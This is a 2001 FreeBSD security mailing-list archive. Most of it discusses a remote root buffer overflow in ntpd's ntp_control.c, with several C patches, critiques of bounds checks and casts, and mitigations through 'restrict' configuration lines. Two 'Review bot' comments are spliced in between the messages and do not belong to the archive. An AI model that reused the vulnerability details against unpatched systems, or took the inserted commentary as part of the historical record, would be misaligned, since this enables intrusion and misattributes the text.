If the reader of this e-mail is not the intended recipient, or the employee or agent responsible to deliver it to the intended recipient, you are hereby notified that any review, dissemination, distribution or copying of this communication is strictly prohibited. If you have received this e-mail in error, please contact postmaster@globalstar.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 20:11:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from roble.com (mx0.roble.com [206.40.34.14]) by hub.freebsd.org (Postfix) with ESMTP id C5D2237B423 for ; Wed, 4 Apr 2001 20:11:13 -0700 (PDT) (envelope-from marquis@roble.com) Received: from localhost (marquis@localhost) by roble.com with ESMTP id f353BDe04809 for ; Wed, 4 Apr 2001 20:11:13 -0700 (PDT) Date: Wed, 4 Apr 2001 20:11:13 -0700 (PDT) 
From: Roger Marquis To: security@FreeBSD.ORG Subject: http://www.freebsd.org/security being maintained? (ntpd/ftpd/...) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is anyone maintaining http://www.freebsd.org/security/? I ask because it hasn't been updated in over a month and contains no information on the ntpd or ftpd vulnerabilities. -- Roger Marquis Roble Systems Consulting http://www.roble.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 20:15:34 2001 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id 0BF6137B423 for ; Wed, 4 Apr 2001 20:15:29 -0700 (PDT) (envelope-from marka@nominum.com) Received: from nominum.com (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.11.2/8.11.2) with ESMTP id f353ENT37642; Thu, 5 Apr 2001 13:14:24 +1000 (EST) (envelope-from marka@nominum.com) Message-Id: <200104050314.f353ENT37642@drugs.dv.isc.org> To: "Crist Clark" Cc: David La Croix , Michael Bryan , freebsd-security@FreeBSD.ORG From: Mark.Andrews@nominum.com Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-reply-to: Your message of "Wed, 04 Apr 2001 19:09:03 MST." <3ACBD3BF.52BF23E6@globalstar.com> Date: Thu, 05 Apr 2001 13:14:23 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following stomps this particular overflow. Mark Index: contrib/ntp/ntpd/ntp_control.c =================================================================== RCS file: /home/ncvs/src/contrib/ntp/ntpd/ntp_control.c,v retrieving revision 1.1.1.2 diff -u -r1.1.1.2 ntp_control.c --- contrib/ntp/ntpd/ntp_control.c 2000/01/28 14:53:03 1.1.1.2 +++ contrib/ntp/ntpd/ntp_control.c 2001/04/05 03:07:25 
@@ -1650,11 +1650,15 @@ while (cp < reqend && isspace((int)*cp)) cp++; while (cp < reqend && *cp != ',') + if (tp - buf < sizeof(buf) - 1) *tp++ = *cp++; + else + cp++; if (cp < reqend) cp++; *tp = '\0'; - while (isspace((int)(*(tp-1)))) + while (tp != buf && + isspace((int)(*(tp-1)))) *(--tp) = '\0'; reqpt = cp; *data = buf; > David La Croix wrote: > > > > > > > > > > > Heads up. This just came across BugTraq, will likely affect FreeBSD. > > > As of 4.2-RELEASE, the ntpd that ships with FreeBSD is 4.0.99b. > > > > > > > > > > Haven't seen anybody mention this yet.... (and I hate to admit to > > still using 3.x) I have a production box which I haven't upgraded yet... > > > > Is the version of xntpd in 3.x-STABLE (xntpdc version=3.4e) > > succeptable to this, or any other, known buffer overflows? > > Test it. If you compile the code and shoot, it will crash the daemon > even if the exploit is not successful. But that tells you the potential > is there. > > I took that FreeBSD and Linux exploit and aimed it at Sparc box running > xntpd 3.4y and *CRASH*. The xntpd cored and died. The buffer overrun > looks like it goes back at least that far. It should not be too hard > to track it to the source. But I am too busy trying to assess how to > handle all the machines I _know_ are vulnerable to do that. > > The idea that something like the NTP built in to Cisco's IOS might be > based off of vulnerable [x]ntpd code frankly scares the beejeezus out > of me. > -- > Crist J. Clark Network Security Engineer > crist.clark@globalstar.com Globalstar, L.P. > (408) 933-4387 FAX: (408) 933-4926 > > The information contained in this e-mail message is confidential, > intended only for the use of the individual or entity named above. 
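Review bot: In the `@@ -1650,11 +1650,15 @@` hunk an over-long variable name is silently truncated: once `tp - buf < sizeof(buf) - 1` fails, the `else cp++` branch just discards input, and the shortened name is handed back through `*data = buf` as if it were what the client sent. The bound itself is right and leaves room for `*tp = '\0'`, and the new `tp != buf` guard stops the trim loop from reading `*(tp-1)` before the start of the buffer when the name is empty. Consider rejecting or logging the request when truncation happens, and bracing the `while` body now that it holds an `if`/`else`.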
If > the reader of this e-mail is not the intended recipient, or the employee > or agent responsible to deliver it to the intended recipient, you are > hereby notified that any review, dissemination, distribution or copying > of this communication is strictly prohibited. If you have received this > e-mail in error, please contact postmaster@globalstar.com > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- Mark Andrews, Nominum Inc. 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@nominum.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 21:41:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from grok.example.net (a0g1355ly34tj.bc.hsia.telus.net [216.232.252.235]) by hub.freebsd.org (Postfix) with ESMTP id EB1F837B42C for ; Wed, 4 Apr 2001 21:41:21 -0700 (PDT) (envelope-from sreid@sea-to-sky.net) Received: by grok.example.net (Postfix, from userid 1000) id 02F2A21334A; Wed, 4 Apr 2001 21:41:20 -0700 (PDT) Date: Wed, 4 Apr 2001 21:41:20 -0700 From: Steve Reid To: Michael Bryan Cc: freebsd-security@FreeBSD.ORG Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow Message-ID: <20010404214120.B22906@grok.bc.hsia.telus.net> References: <3ACBB263.2804E9C2@ursine.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <3ACBB263.2804E9C2@ursine.com>; from Michael Bryan on Wed, Apr 04, 2001 at 04:46:43PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Apr 04, 2001 at 04:46:43PM -0700, Michael Bryan wrote: 
> From: Przemyslaw Frasunek
> Subject: ntpd =< 4.0.99k remote buffer overflow
> To: BUGTRAQ@SECURITYFOCUS.COM
> /* ntpd remote root exploit / babcia padlina ltd. */

I'm not an ntpd guru by any means, but I have this in my /etc/ntpd.conf:

restrict 127.0.0.1
restrict default noquery nomodify notrap nopeer

The exploit crashes my ntpd when run locally, but not when run remotely. Tcpdump confirms that the remote packets are arriving.

I _think_ those restrict lines permit full access to localhost, but limit external stuff to ntp query responses. That should be suitable for the typical box that just wants to keep its clock synchronized.

It's probably possible to improve upon that configuration; I barely understood ntpd configuration when I created that ntpd.conf and have forgotten what little I did learn.

It is possible to spoof 127.0.0.1 if you don't have a firewall blocking such bogons. I think excluding the "restrict 127.0.0.1" line should eliminate that hole.

A proper patch should be applied of course, but I think this goes to show that tightening a configuration is generally good practice. This is especially true for network daemons that must run as root for their whole life, and especially true for network daemons that are as feature-rich (see the man page for details) as ntpd.
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 22:44:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 272C037B50C; Wed, 4 Apr 2001 22:44:08 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (2288 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Thu, 5 Apr 2001 00:43:17 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Thu, 5 Apr 2001 00:43:17 -0500 (CDT) 
From: James Wyatt To: Kherry Zamore Cc: freebsd-stable@freebsd.org, freebsd-security@freebsd.org Subject: Re: su change? In-Reply-To: <005401c0bc63$7cb36650$0202a8c0@majorzoot> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

On Tue, 3 Apr 2001, Kherry Zamore wrote:
> Just recently my friend locked himself out of his machine by changing root's
> shell to a nonexisting file. The only way he could become root again was by
> rebooting the machine into single user mode and changing it from there. Now
> while I know that it's foolish to change root's shell in the first place, I
> don't think this is an acceptable punishment for those that do.

Your friend had a "root awakening", eh? Consider it a cheap lesson on:

1) Use chsh to change shells *always*. If not, use vipw at least.

2) sudo can be a handy beast. It helps forgotten root passwords too!

3) Playing with root's shell is dangerous and, I'm sorry, just stupid. If your new shell has shared libs on another filesystem that fails to mount, you are toast. (BillVer can attest to this from csh on the Tandy 6000.) Scripts should spec their shell, but you could still get caught there too. The csh vs. sh debate is part of why 'toor' was created. sudo also gets around this by letting you use user's favorite shells.

4) Make a playground. Take some abandoned box and install an OS on it to "beat up". Do experimental or "crazy" things on *it* first. (At least you can't kill-off init anymore, you could on the VAX. (^_^)) This is a good idea for WinServers too, btw. Using Ghost(tm), you can bring your machine back from the dead in no time.

Any experienced admin has plenty of tales (tightening access until telnet fails, live ifconfig-ing the WRONG ip, SMTP alias loops, forgetting Caps Lock was on in vi, etc...). I wouldn't hire an admin that didn't have some experience with damage control - you don't know how they will react.
- Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 22:45:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id 28E9837B506 for ; Wed, 4 Apr 2001 22:45:34 -0700 (PDT) (envelope-from marka@nominum.com) Received: from nominum.com (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.11.2/8.11.2) with ESMTP id f355jVT38066 for ; Thu, 5 Apr 2001 15:45:31 +1000 (EST) (envelope-from marka@nominum.com) Message-Id: <200104050545.f355jVT38066@drugs.dv.isc.org> To: freebsd-security@freebsd.org From: Mark.Andrews@nominum.com Subject: ntpd: committed fix still contains buffer overrun Date: Thu, 05 Apr 2001 15:45:31 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There are still buffer over and under runs and the previous fix introduces a DoS. Mark Index: ntp_control.c =================================================================== RCS file: /home/ncvs/src/contrib/ntp/ntpd/ntp_control.c,v retrieving revision 1.1.1.2.2.1 diff -u -r1.1.1.2.2.1 ntp_control.c --- ntp_control.c 2001/04/04 23:09:10 1.1.1.2.2.1 +++ ntp_control.c 2001/04/05 05:35:37
@@ -1656,22 +1656,14 @@ cp++; while (cp < reqend && *cp != ',') { *tp++ = *cp++; - if (tp > buf + sizeof(buf)) { - msyslog(LOG_WARNING, "Attempted \"ntpdx\" exploit from IP %d.%d.%d.%d:%d (possibly spoofed)\n", - (ntohl(rmt_addr->sin_addr.s_addr) >> 24) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 16) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 8) & 0xff, - (ntohl(rmt_addr->sin_addr.s_addr) >> 0) & 0xff, - ntohs(rmt_addr->sin_port) -); - + if (tp > buf + sizeof(buf) - 1) return (0); - } } if (cp < reqend) cp++; *tp = '\0'; - while (isspace((int)(*(tp-1)))) + while (tp != buf && + isspace((int)(*(tp-1)))) *(--tp) = '\0'; reqpt = cp; *data = buf; -- Mark Andrews, Nominum Inc. 1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@nominum.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 6:25:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from bajoran.xsinet.co.za (bajoran.xsinet.co.za [196.25.196.73]) by hub.freebsd.org (Postfix) with SMTP id 37CDA37B505 for ; Thu, 5 Apr 2001 06:25:13 -0700 (PDT) (envelope-from patrick@xsinet.com) Received: (qmail 46583 invoked from network); 5 Apr 2001 13:37:19 -0000 Received: from unknown (HELO xsinet.com) (192.168.2.1) by 0 with SMTP; 5 Apr 2001 13:37:19 -0000 Message-ID: <3ACC73A4.A5F92299@xsinet.com> Date: Thu, 05 Apr 2001 15:31:17 +0200 
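Review bot: the trailing-white-space loop in the @@ -1656,22 +1656,14 @@ hunk of the ntp_control.c patch above gains the tp != buf guard but keeps isspace((int)(*(tp-1))). Where plain char is signed, a byte above 0x7f reaches isspace() as a negative int, outside the values the function is defined for (EOF or an unsigned char value), so the argument should be cast to unsigned char. The new test, if (tp > buf + sizeof(buf) - 1), runs after the store *tp++ = *cp++; it is correct as written, since the return fires before *tp = '\0' could land past the array, but testing before the store would make that visible without counting.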
From: Patrick Reply-To: patrick@xsinet.com Organization: XSInet X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.3-RC i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@FreeBSD.org Subject: Apache 1.3.19 Bsd 4.3 RC Core Dump Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

i have recently cvsuped a clean install to bsd 4.3 RC and then immediately i install apache 13-modssl out of the ports tree i attempt to run it and it automagically core dumps any ideas ??

Patrick
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 7: 1:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from shemp.palomine.net (shemp.palomine.net [205.198.88.200]) by hub.freebsd.org (Postfix) with SMTP id 1938D37B422 for ; Thu, 5 Apr 2001 07:01:38 -0700 (PDT) (envelope-from cjohnson@palomine.net) Received: (qmail 25450 invoked by uid 1000); 5 Apr 2001 14:01:30 -0000 Date: Thu, 5 Apr 2001 10:01:30 -0400 
From: Chris Johnson To: Patrick Cc: freebsd-security@FreeBSD.org Subject: Re: Apache 1.3.19 Bsd 4.3 RC Core Dump Message-ID: <20010405100130.A25353@palomine.net> References: <3ACC73A4.A5F92299@xsinet.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="7AUc2qLy4jB3hD7Z" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3ACC73A4.A5F92299@xsinet.com>; from patrick@xsinet.com on Thu, Apr 05, 2001 at 03:31:17PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --7AUc2qLy4jB3hD7Z Content-Type: text/plain; charset=us-ascii Content-Disposition: inline

On Thu, Apr 05, 2001 at 03:31:17PM +0200, Patrick wrote:
> i have recently cvsuped a clean install to bsd 4.3 RC and then
> immediately i install apache 13-modssl out of the ports tree i attempt
> to run it and it automagically core dumps any ideas ??

First, get a new keyboard; your shift and period keys are broken.

Second, check the list archives. This has been discussed frequently and at great length.
Chris --7AUc2qLy4jB3hD7Z-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 7:18:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 2EE6037B496 for ; Thu, 5 Apr 2001 07:18:53 -0700 (PDT) (envelope-from ache@nagual.pp.ru) Received: (from ache@localhost) by nagual.pp.ru (8.11.3/8.11.3) id f35EIlk98936; Thu, 5 Apr 2001 18:18:47 +0400 (MSD) (envelope-from ache) Date: Thu, 5 Apr 2001 18:18:45 +0400
From: "Andrey A. Chernov" To: Mark.Andrews@nominum.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: ntpd: committed fix still contains buffer overrun Message-ID: <20010405181844.A98479@nagual.pp.ru> References: <200104050545.f355jVT38066@drugs.dv.isc.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200104050545.f355jVT38066@drugs.dv.isc.org>; from Mark.Andrews@nominum.com on Thu, Apr 05, 2001 at 03:45:31PM +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Apr 05, 2001 at 15:45:31 +1000, Mark.Andrews@nominum.com wrote: > - while (isspace((int)(*(tp-1)))) > + while (tp != buf && > + isspace((int)(*(tp-1)))) I wonder how many different variants of wrong cast people use in that place: int, unsigned, etc. Proper cast is one: (unsigned char) Please, fix. -- Andrey A. Chernov http://ache.pp.ru/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 8:13:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 3478137B446; Thu, 5 Apr 2001 08:13:22 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id RAA65794; Thu, 5 Apr 2001 17:13:17 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: James Wyatt Cc: Kherry Zamore , freebsd-stable@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: su change? References: 
From: Dag-Erling Smorgrav Date: 05 Apr 2001 17:13:17 +0200 In-Reply-To: James Wyatt's message of "Thu, 5 Apr 2001 00:43:17 -0500 (CDT)" Message-ID: Lines: 9 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org James Wyatt writes: > Any experienced admin has plenty of tales (tightening access until telnet > fails I consider this (telnetd not working) a feature. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 9:41:11 2001 Delivered-To: freebsd-security@freebsd.org Received: from homer.softweyr.com (bsdconspiracy.net [208.187.122.220]) by hub.freebsd.org (Postfix) with ESMTP id 615D637B509 for ; Thu, 5 Apr 2001 09:41:08 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [127.0.0.1] (helo=softweyr.com ident=65e84f8068ef6612eb03e1d92679fac4) by homer.softweyr.com with esmtp (Exim 3.16 #1) id 14kfZd-0000DO-00; Tue, 03 Apr 2001 23:11:17 -0600 Message-ID: <3ACAACF5.A29297E7@softweyr.com> Date: Tue, 03 Apr 2001 23:11:17 -0600 
From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.75 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 To: Gerhard Sittig Cc: freebsd-security@freebsd.org Subject: Re: Something's happening with named References: <4630.010329@rostokgroup.com> <5.0.0.25.0.20010329195331.06d46eb0@mail.Go2France.com> <20010402025846.C75063@mail.webmonster.de> <20010402190426.H20830@speedy.gsinet> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Gerhard Sittig wrote: > > Sorry, I lack English words. But in German "heikel" > ("troublesome"?) would be most appropriate. I'm sure the other > replies will tend to some "highly dangerous from the non > technical POV", too. :( Exactly. DJB's code is quite good for what it does, but changing it without his permission violates his license. That's his choice, and I intend to respect it, as I'm sure we all do. Offering djbdns/tinydns (unmodified, as the port/package builds it) as an option at or after installation is a fine idea, but I wouldn't want to replace bind with it due to the licensing inflexibility. I can also think of numerous not-so-large installations that may want to use features of bind that are not in djbdns, like Dynamic DNS. > We all should be glad that it's so easy to not run bind and > install djbdns from the ports instead. This makes it a > consious(sp?) decision by the admin. It's very much like running conscious > an MTA different from sendmail or running non main stream > software at all: You're free to do it but you have to take care > yourself ... This would be one of the goals of making FreeBSD installations more granular, being able to choose between multiple MTA configurations, multiple DNS server configurations, etc. -- "Where am I, and what am I doing in this handbasket?" 
Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 11:10:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 2B63A37B446; Thu, 5 Apr 2001 11:10:08 -0700 (PDT) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (928 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Thu, 5 Apr 2001 13:08:57 -0500 (CDT) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Thu, 5 Apr 2001 13:08:56 -0500 (CDT) 
From: James Wyatt To: Dag-Erling Smorgrav Cc: Kherry Zamore , freebsd-stable@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: su change? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 5 Apr 2001, Dag-Erling Smorgrav wrote: > James Wyatt writes: > > Any experienced admin has plenty of tales (tightening access until telnet > > fails > > I consider this (telnetd not working) a feature. Not until you get sshd working! - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 14:52:20 2001 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 31EC337B424; Thu, 5 Apr 2001 14:52:14 -0700 (PDT) (envelope-from des@ofug.org) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id XAA67298; Thu, 5 Apr 2001 23:52:10 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: James Wyatt Cc: Kherry Zamore , freebsd-stable@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: su change? References: 
From: Dag-Erling Smorgrav Date: 05 Apr 2001 23:52:10 +0200 In-Reply-To: James Wyatt's message of "Thu, 5 Apr 2001 13:08:56 -0500 (CDT)" Message-ID: Lines: 14 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org James Wyatt writes: > On 5 Apr 2001, Dag-Erling Smorgrav wrote: > > James Wyatt writes: > > > Any experienced admin has plenty of tales (tightening access until telnet > > > fails > > I consider this (telnetd not working) a feature. > Not until you get sshd working! - Jy@ But your box isn't on the net until you get sshd working, so what's the problem? DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 15: 6:15 2001 Delivered-To: freebsd-security@freebsd.org Received: from awww.jeah.net (awww.jeah.net [216.111.239.130]) by hub.freebsd.org (Postfix) with ESMTP id ABDAC37B446 for ; Thu, 5 Apr 2001 15:06:11 -0700 (PDT) (envelope-from chris@jeah.net) Received: from localhost (chris@localhost) by awww.jeah.net (8.11.3/8.11.0) with ESMTP id f35M6Ls90799 for ; Thu, 5 Apr 2001 17:06:22 -0500 (CDT) (envelope-from chris@jeah.net) Date: Thu, 5 Apr 2001 17:06:20 -0500 (CDT) 
From: Chris Byrnes To: Subject: ntpd patch Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I tried to apply the patch that was just sent to the list, and received: awww# patch -p < ntp.patch Hmm... Looks like a unified diff to me... The text leading up to this was: -------------------------- |Index: ntp_control.c |=================================================================== |RCS file: /home/ncvs/src/contrib/ntp/ntpd/ntp_control.c,v |retrieving revision 1.1.1.2.2.1 |diff -u -r1.1.1.2.2.1 ntp_control.c |--- ntp_control.c 2001/04/04 23:09:10 1.1.1.2.2.1 |+++ ntp_control.c 2001/04/05 05:35:37 -------------------------- Patching file ntp_control.c using Plan A... Hunk #1 failed at 1656. 1 out of 1 hunks failed--saving rejects to ntp_control.c.rej done awww# + Chris Byrnes, chris@JEAH.net + JEAH Communications + 1-866-AWW-JEAH (Toll-Free) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 16:14:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from drugs.dv.isc.org (drugs.dv.isc.org [130.155.191.236]) by hub.freebsd.org (Postfix) with ESMTP id 6DAAA37B506 for ; Thu, 5 Apr 2001 16:14:35 -0700 (PDT) (envelope-from marka@nominum.com) Received: from nominum.com (localhost.dv.isc.org [127.0.0.1]) by drugs.dv.isc.org (8.11.2/8.11.2) with ESMTP id f35NE6T54121; Fri, 6 Apr 2001 09:14:08 +1000 (EST) (envelope-from marka@nominum.com) Message-Id: <200104052314.f35NE6T54121@drugs.dv.isc.org> To: Chris Byrnes Cc: security@freebsd.org 
From: Mark.Andrews@nominum.com Subject: Re: ntpd patch In-reply-to: Your message of "Thu, 05 Apr 2001 17:06:20 EST." Date: Fri, 06 Apr 2001 09:14:06 +1000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org

How did you save it? Cut-and-paste by any chance? Saved it on a Windows box then binary transferred it to the FreeBSD box? Neither of these methods is a good way of handling patches in email. The first tends to replace tabs with spaces, the second introduces carriage returns.

Since for some reason I haven't actually seen my post come through, there is no way I can see what various MTAs have done to it on this list; however, I regularly send patches.

Mark

> I tried to apply the patch that was just sent to the list, and received:
>
> awww# patch -p < ntp.patch
> Hmm... Looks like a unified diff to me...
> The text leading up to this was:
> --------------------------
> |Index: ntp_control.c
> |===================================================================
> |RCS file: /home/ncvs/src/contrib/ntp/ntpd/ntp_control.c,v
> |retrieving revision 1.1.1.2.2.1
> |diff -u -r1.1.1.2.2.1 ntp_control.c
> |--- ntp_control.c 2001/04/04 23:09:10 1.1.1.2.2.1
> |+++ ntp_control.c 2001/04/05 05:35:37
> --------------------------
> Patching file ntp_control.c using Plan A...
> Hunk #1 failed at 1656.
> 1 out of 1 hunks failed--saving rejects to ntp_control.c.rej
> done
> awww#
>
-- Mark Andrews, Nominum Inc.
1 Seymour St., Dundas Valley, NSW 2117, Australia PHONE: +61 2 9871 4742 INTERNET: Mark.Andrews@nominum.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 16:28:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 34DBF37B505 for ; Thu, 5 Apr 2001 16:28:24 -0700 (PDT) (envelope-from dillon@earth.backplane.com) Received: (from dillon@localhost) by earth.backplane.com (8.11.2/8.9.3) id f35NSN232886; Thu, 5 Apr 2001 16:28:23 -0700 (PDT) (envelope-from dillon) Date: Thu, 5 Apr 2001 16:28:23 -0700 (PDT) From: Matt Dillon Message-Id: <200104052328.f35NSN232886@earth.backplane.com> To: Mark.Andrews@nominum.com Cc: Chris Byrnes , security@FreeBSD.ORG Subject: Re: ntpd patch References: <200104052314.f35NE6T54121@drugs.dv.isc.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Poul's patch: http://apollo.backplane.com/FreeBSD/ntpd-patch1.diff Off-by-1 fix + buffer underflow http://apollo.backplane.com/FreeBSD/ntpd-patch2.diff (second patch from Mark Andrews and others?) -Matt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 5 16:55:25 2001 Delivered-To: freebsd-security@freebsd.org Received: from nagual.pp.ru (pobrecita.freebsd.ru [194.87.13.42]) by hub.freebsd.org (Postfix) with ESMTP id 77B4437B43F for ; Thu, 5 Apr 2001 16:55:22 -0700 (PDT) (envelope-from ache@nagual.pp.ru) Received: (from ache@localhost) by nagual.pp.ru (8.11.3/8.11.3) id f35Nt0806376; Fri, 6 Apr 2001 03:55:00 +0400 (MSD) (envelope-from ache) Date: Fri, 6 Apr 2001 03:54:59 +0400 
